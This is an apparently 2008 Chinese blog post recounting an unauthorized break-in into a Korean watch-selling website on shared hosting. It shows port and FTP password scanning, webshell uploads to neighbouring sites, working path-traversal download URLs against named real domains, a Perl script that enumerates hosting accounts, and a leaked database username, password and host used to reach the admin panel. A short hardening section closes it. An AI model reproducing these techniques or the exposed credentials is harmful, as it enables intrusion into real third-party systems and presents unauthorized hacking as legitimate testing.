对韩国某手表网站的一次偶然安全检测

admin

韩国是美国的小弟，俺是安全爱好者，看到网站就想看看该网站的安全做的如何，当我浏览网站产品时，如果要查看详细情况时，都会自动跳转到登录页面。如图2所示，仅仅查看而已，都要登录，有这个必要吗？到底它网站的安全性如何呢？
http://images.51cto.com/files/uploadimg/20081104/163830926.jpg
5 n6 _5 \- W7 ^# X图2跳转后的登录界面
3 I* ]0 ?: T4 m' Z$ S: b

一、信息收集
1.获取IP地址
9 N7 C: N" J/ \  I" K首先打开DOS窗口，然后使用“ping XXX.net”获取该网站的真实IP地址，如图3所示，通过ping命令知道该主机应该采取了一些安全措施，丢包率比较高，应该是禁止进行ping等命令。
链接标记http://images.51cto.com/files/uploadimg/20081104/163845179.jpg
图3 获取真实IP地址


2.使用superscan探测端口
请出俺的扫描工具——superscan，使用supersan3.0扫了一下IP地址为“XX.XX.85.96”的端口开放情况，如图4所示，发现只开了21，22，80端口，从端口开放情况来看，对外提供服务仅仅21和80端口，感觉安全应该还可以，只能从Web和Ftp来入手。
& [! x2 I* T2 X- e, k链接标记http://images.51cto.com/files/uploadimg/20081104/163910321.jpg
' b* Q' [* G# U7 m图4情况开放情况
! t% J) X( B3 _: U1 z

3.Ftp口令扫描
4 c7 Q6 W3 o' d9 N4 o+ R使用一些Ftp口令扫描工具对该IP地址扫描，使用了多个字典进行扫描，均未成功，看来Ftp口令扫描攻击方法不行。
说明：
一般站点都会开放Ftp服务，Ftp服务主要用来上传程序等，一般默认会设置在Web目录，因此一旦获取了Ftp口令，就可以跟用户一样“正常”使用Ftp来上传和下载Web程序，通过上传Webshell或者获取数据库等方式来进行渗透和控制。
二、检查SQL注入攻击点
1.寻找注入点
先手动对该网站地址进行SQL注入点的检测，在地址后加入“’”、“or”等，例如在地址栏中分别输入：链接标记[url]http://XXX.net/goods/content.asp?big=3&middle=12&small=1&num=30967’[/url]后回车，在地址栏中会自动变成“链接标记[url]http://rolexcopy.net/goods/content.asp?big=3&middle=12&small=1&num=30967%20and%201=1[/url]”，如图5所示，
链接标记http://images.51cto.com/files/uploadimg/20081104/163926236.jpg
图5 出现SQL错误提示
# l& c; R, V0 \/ K
. W; b( n$ P0 o8 G3 \2 s8 w虽然手动检测结果提示为SQL错误，当后面使用一些脚本测试，没有找到明显的SQL注入点，使用HDSI等工具进行探测的结果也显示无注入点，说明暂时找不到注入点。
2.寻找上传地址
3 {3 ~  m; j' _1 p0 Q* t通过是使用Flashget以及digshell挖掘鸡等工具对该网站进行上传地址搜索和检查，在链接标记[url]http://xxx.net/other/contact_us.asp[/url]这个页面找到一个上传，但不能上传asp、asa等可以提升权限的文件类型。
3.旁注信息搜集
5 Q: G! |4 g; n4 Y既然正面不能突破，那么就从侧面，通过旁注来看看可否获取该网站的Webshell。打开链接标记[url]http://www.myipneighbors.com/[/url] 输入XXX.net后发现同一服务器下一共有226个站，如图6所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164425298.jpg  
/ Y& G$ |* ^+ _$ x- p图6同一服务器下的存在的网站

. H, `" l6 H5 N! Q- F8 o
说明：
: t0 d0 ]- F8 k( D; q链接标记[url]http://www.myipneighbors.com/[/url] 是一个通过IP地址或者域名来获取该IP地址或者域名所在服务器中所存在的其它网站地址。它是一个旁注的辅助工具，当然在明小子Domain3.5以及其它一些工具软件中也有这个功能。
+ n0 O, z- [" O1 w/ e& A1 ]既然在该IP地址上有226个网站，那就从其它网站入手吧。
6 j! ]' B0 ~2 A# m4 P/ k$ X& Y5 d4.尝试对其它站点进行渗透
对剩下的225个网站随机进行SQL注入点探测，随机选中一个网站“hansincar.cafe24.com”，从中找到一个可上传的地方，可以直接上传文件，将本地的一个Webshell文件上传到该站点，上传文件成功后，asp木马却无法运行，如图7所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164003770.jpg
2 s8 D3 f+ A. Q图7无权限运行asp木马
/ n9 M' @' y' i. N
看来该站点无法找到突破点，那就选择下一个网站进行探测吧。后面我对多个站点进行了SQL注入探测和寻找文件上传地址。通过探测虽然很多网站存在注入点，但都是public权限，无法备份得shell；即使成功进入后台后，有上传的地方，上传后还是没有运行脚本的权限。
说明管理员对该主机采取了严格的基于网站用户角色的安全权限策略，安全设置比较变态，对每个可上传的目录做了限制，仅对已知文件脚本类型运行，而禁止对其它脚本运行，各个网站之间安全先对独立。
2 ^* A+ w7 K  S三、获取突破点
8 G: S9 g- _& j% F' e1.任意下载文件
+ q# b$ c5 t8 n2 r$ o5 z在我即将要放弃安全测试时，在打开链接标记[url]http://nowmotors.com/bbs/content ... =164&bid=used01[/url]页面时，发现可以有下载的地方，而下载的参数就是一个文件，如果没有做限制的话，那就可以下载任何文件！如图8所示。
1 Y. m5 J) ^+ @+ J* R链接标记http://images.51cto.com/files/uploadimg/20081104/164039139.jpg
图8下载文件页面

# F" k4 z* q2 I* Y
( o4 a, n9 a* t7 s2.获取上传文件地址
. F# w9 t. w7 [) j# K  [通过测试发现该上传页面可以上传任何文件，而在对另一网站注入时，也得到了网站的绝对路径（F:\HOME\HANSINCAR\WWW\HELPDESK\../board/inc/view.asp），如图9所示。
( ~) o0 `; J$ a+ W链接标记http://images.51cto.com/files/uploadimg/20081104/164054405.jpg
图9获取网站的绝对路径
0 Y  P# d1 j! @- C- k" }
3.推测网站绝对路径
- H+ A# ~" W4 k4 P! D/ j通过观察，可以知道在该服务器上每个网站的绝对路径就是“F:\用户名\WWW\”，于是可以构造一个地址下载网站中的源程序：链接标记[url]http://nowmotors.com/bbs/filedow ... w/goods/submain.asp[/url]
说明：
（1）打算下载链接标记[url]http://XXX.net/goods/submain.asp[/url]文件（这里说明一下，因为down默认检查文件名的目录是DEXTUpload/editor/中，查看图片的属性就知道了，所以要"../../"返回网站的根目录），但发现却无法下载，如图10所示。
0 o" Y% `- u* G  B/ T链接标记http://images.51cto.com/files/uploadimg/20081104/164108656.jpg
2 R  b9 f, D3 w- T图10无法下载源文件

5 }( O$ X0 j) M8 r/ l$ a/ w
3 }+ ?$ {/ H- O1 r7 ^（2）分析不能下载原因
难道真的做了限制，还是权限问题？还是其它，nowmotors.com网站肯定存在上传漏洞，更换一个网站进行测试：
链接标记[url]http://nowmotors.com/bbs/filedown.asp?filename=../../../../hansincar/www/board/inc/view.asp[/url]
' i1 i; F6 z. e8 ?6 \/ @; y发现可以下载，如图11所示。
' \* }; t& P& s5 C+ r) Q7 y( [链接标记http://images.51cto.com/files/uploadimg/20081104/164238964.jpg
图11正常下载nowmotors.com网站文件
+ p0 U: _# |( ^/ o3 @( S; V, T% B
# T* z1 J. C: m8 b" q; F5 ^
  j$ f9 |( u6 x0 U, m, X  ?  D- D7 o但为什么不能下载XXX.net网站中的文件呢，该网站中的submain.asp是存在的，那只有一种可能——用户名XXX不存在。
（3）获取网站的真正用户名
怎么找到此网站的用户名呢？一个好的办法就是通过网站域名注册信息来获取用户的网站用户名，通过whois.domaintools.com来获取
XXX.net网站域名注册信息，如图12所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164250229.jpg
图12获取rolexcopy的域名注册信息
2 a4 P( r  Q' ^  e$ C  q; k. B! i$ W
/ A/ Q6 J( `" Y! }
（4）下载仍然失败
于是尝试将原来的用户名更换为“tmdgus022”和“tmdgus”，进行测试：链接标记[url]http://nowmotors.com/bbs/filedown.asp?filename=../../../../tmdgus022/www/goods/submain.asp[/url] 链接标记[url]http://nowmotors.com/bbs/filedown.asp?filename=../../../../tmdgus/www/goods/submain.asp[/url]
+ i5 Q( q+ w. J测试结果都显示找不到文件，看来通过该方法仍然无法下载源文件。
  y0 \( F, ]1 ^+ ]. C3 q四、新的转机
* ~# z! f& _( s) Z( B1.动手构建获取网站用户名的程序
: s8 Q2 P& d# C  O- H现在的问题就是要找到网站对应的用户名。在某一网站后台，发现有可以列目录。
5 W& u9 S$ O6 w7 J却跳不出该网站的根目录（在根目录时，“../”是不可点击），不可点击，那可以构造URL跳出，于是先看点击返回上一级目录时跳转到的URL，
于是找到处理该JS的代码，如下：
/ s, O  U# F: d& M$ B, l# ~  Y[pre]function page_link(FormName, InputName, f_prev, r_name, r_folder, l_folder, last) {
# F4 l: `8 Z, {1 X3 Zvar targetSTR;
9 p( T2 c# J% @" l$ ]: R# ^# ~
targetSTR = "dir.asp?FormName="+FormName+"&InputName=
; ?) F6 H+ @2 z/ E; \"+InputName+"&f_location="+f_prev;
7 B* _1 Q' ?& P' StargetSTR = targetSTR+"&r_location="+r_name+"&r_folder=
"+r_folder+"&l_folder="+l_folder+"&last="+last;
window.location.href = targetSTR;
+ Z( P1 `$ d; N6 {+ x) A9 e% O. F}
原来跳转到pop_directory.asp，其它参数都不重要，最重要的是f_location这个参数，
% {$ M4 ^9 p  H$ C/ u7 r0 B8 P于是先测试c1saju.com网站，在浏览器中输入：
链接标记[url]http://c1saju.com/admin/inc/pop_directory.asp?FormName=all&f_location=&last=ok[/url]
[/pre]

列出了当前网站的根目录，如图13所示。
- K' I1 E6 V/ U& n# \' _, ~链接标记http://images.51cto.com/files/uploadimg/20081104/164305690.jpg
0 b8 [1 k$ r; o9 V/ X& M, W图13 使用js文件列c1saju.com网站根目录

: }* Z( g4 C2 A) J. ^8 |
, d+ k+ z& y' X/ i& o2.获取根目录用户名称
如果要返回到F:\home就要构造URL：
4 s' r! ]4 G/ \8 e+ C' w6 T& z& l链接标记[url]http://c1saju.com/admin/inc/pop_directory.asp?FormName=all&f_location=../../&last=ok[/url]因为网站的根目录在F:\home\***\www下，发现还是pop_directory.asp的文件还是在网站的根目录下，难道说不能跳出？再仔细看了下“../../”不是刚好返回到网站根目录吗，因为pop_directory.asp文件在F:\home\***\www\admin\inc\目录下，于是重新构造URL
链接标记[url]http://c1saju.com/admin/inc/pop_directory.asp?FormName=all&f_location=../../../../&last=ok[/url]
终于跳到F:\home目录中了，全部的用户名都出来了，如图14所示。
1 l& d3 `/ G) E' s; B) O链接标记http://images.51cto.com/files/uploadimg/20081104/164318699.jpg
; j4 R, ~( g4 R. x图14列出home目录所有用户


3.动手编写find.pl脚本自动获取用户
+ F! q' i9 t, U1 U6 R) j下面的工作就简单了，就是一个个文件夹点进去，看那个是目录目标网站（链接标记[url]http://XXX.net/[/url]），然后就再构造URL下载就行了，但200多个站，一个个看，那不是很累？于是想出来偷懒的方法，写个脚本来自己找吧，先把网站全部用户复制下来，保存到user.txt文件中，再分析目标站点登录界面源代码，发现网站admin/image目录下有个admin_bk.gif文件，将其作为识别特征，也就是说只要我列出每个admin/image目录中目录下发现有admin_bk.gif文件，说明就可能是目标网站了。Find.pl的脚本源代码如下：
; ~* u' z$ Y* s0 \& O[pre]use LWP;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
my $ua=new LWP::UserAgent;
3 t5 k: m6 c  u; d$ua->agent('Mozilla/5.0');
* U: R$ y2 I( G+ _7 ?% r5 B$ua->cookie_jar(new HTTP::Cookies);
1 g. D- R, Y6 e. s6 xopen(FILE,"user.txt") || die ("Could not open file");
my @arr=;
for my $line (@arr) {
chomp $line;
any($line);
! E3 W5 A1 V4 ?9 Q) h, l5 T  |. r}
* J0 Q- k8 C* [$ y. ]2 a" nsub any {
print "分析$_[0]\n";
3 L3 W5 y9 Z% A6 \my $url="链接标记[url]http://c1saju.com/admin/inc/pop_directory.asp?[/url]
4 L; u0 a/ g1 yFormName=all&InputName=ji_AbsFolder&f_location=../../../../$_
[0]/www/admin/image&r_location=../../../../&r_folder=
5 p! A# f1 K+ S: |" B# ~$_[0]/www/admin/image&l_folder=admin&last=";
/ Z! _. A9 D9 z+ imy ($content, $status, $is_success) = do_GET($url);
$ E6 o) Q: T0 R. {1 r' v: `" Wif ($content =~ m/pop_directory.asp/) {
! ?9 l, o2 i( p' ]next;
6 `& z: i" h$ @# d}elsif ($content =~ m/admin_bk.gif/) {
& H4 L  n; E. `6 u: Y( T# ]ok($_[0]);
1 A, ]4 N  T$ {# V0 \+ o! ~& C}
; f  U% @: k# Y4 P) z- j}
sub do_GET {
+ i. t: a) w4 {6 B- o5 \) \$browser = LWP::UserAgent->new unless $browser;
my $resp = $browser->get(@_);
return ($resp->content, $resp->status_line, $resp->is_success, $resp)
if wantarray;
5 F5 P2 X% @; a& z5 m6 Jreturn unless $resp->is_success;
$ V7 n* _' D+ J; v* [* Y& O! lreturn $resp->content;
}
% d$ E1 q+ K/ g2 v- B0 t) H0 W% Hsub ok {
open(FILE1,">>e:/perl/0k.txt") || die ("Could not open file");
. h, I  N- B5 T  @) Fprint FILE1 "$_[0]\r\n";
close(FILE1);
3 o; i& _% C) Q}
9 V/ n$ g. T% S5 R4 a! P- u5 v[/pre]

在本地运行一下find.pl，等待一分钟左右再打开ok.txt，在该文件中发现有多个用户名
注意：
$ T% `9 ^6 u: g' Y) S如果选好过滤的文件为admin_bk.gif，就不会出现那么多用户名了。
* `( i8 ?4 Q" L, I4. 获取rolexcopy.net网站的真实目录
通过在浏览器中对find.pl找到的ok.txt结果进行查看，当找到mykom.cafe24.com，发现和网站链接标记[url]http://XXX.net/[/url]一摸一样，XXX.net网站的目录就是“mykom”目录，如图15所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164334325.jpg
图15获取rolexcopy.net网站的真实目录mykom
. @" U5 X+ S" {$ [  m# c, x  k, L

5.下载数据库文件
通过分析该网站目录，找到数据库配置文件dbconfig.asp，通过nowmotors.com网站的文件下载漏洞将其下载到本地：
4 Y. y- x0 y+ f& J2 i2 |: w, Q链接标记[url]http://nowmotors.com/bbs/filedown.asp?filename=../../../../mykom/www/dbconfig.asp[/url]
成功下载，打看看，得到了用户名和密码。
[pre]db_name = "mykom"
db_id = "mykom"  
0 }3 A5 `  K9 F/ o; U% R% Wdb_pass = "parksu7616"
db_domain = "sql-007.cafe24.com"
/ F7 D2 F6 U- q/ T% l2 i3 n: ]! R[/pre]
% V5 \+ u/ s* f% ]  d; ^- C- j' q
在本地用webshell连接一下远程数据库，得到管理员用户名和密码，如图16所示，管理员对应的密码为名为，省去破解md5密码值了。
链接标记http://images.51cto.com/files/uploadimg/20081104/164346549.jpg
图16 使用本地rootkit.asp获取用户名和密码


6.进入管理后台
4 y$ M  \/ [  J  w9 u0 ^在后台直接输入获取的用户名和密码登录，如图17所示，成功进入后台，由于俺不是哈韩族，也不认识几个韩文，检查到此为止！ 链接标记http://images.51cto.com/files/uploadimg/20081104/164357112.jpg
" V; c2 H3 g; Z! |图17成功进入rolexcopy.net网站管理后台

8 q$ q1 Q, _; c! c7 m5 D1 {五、安全防范措施
就本此渗透过程来看，网站的安全已经设置的比较到位了，但是由于程序中的漏洞，导致了本次渗透成功，因此从安全防范的措施来说，建议就如下方面进行安全加固：
（1）严格过来脚本
对于可下载任意文件这个漏洞，不少网站都存在，后果也很严重，其实最简单的方法就是把filename参数里的”../”过滤掉就OK了。
（2）涉及用户登录模块，一定要对密码进行加密，而且建议采取一些经过变换的md5加密。
2 [6 c5 m9 w7 J/ ~( @* ?7 N（3）重新审查程序中SQL注入漏洞和XSS漏洞，本此检查未对XSS进行检查，但该服务器下多个网站存在SQL注入漏洞，因此也是安全的一个隐患。
六、总结与体会
  ~- d  C2 N# }6 j本次从检测上来说，并没有什么新的检测技术，都是一些老技术。本次检测的亮点就是自己动手编写了一个搜索脚本，自动获取管理用户目录；同时也说明在注入时代，不通过过注入，也一样可以拿到一个网站后台。最后需要提一下perl语言，它真是个好的语言，特别是处理一些重复的网页问题时，可以让我们减少很多重复性的工作，在入侵过程可以起到事半功倍的效果。
' B, b9 G7 B9 }7 y* [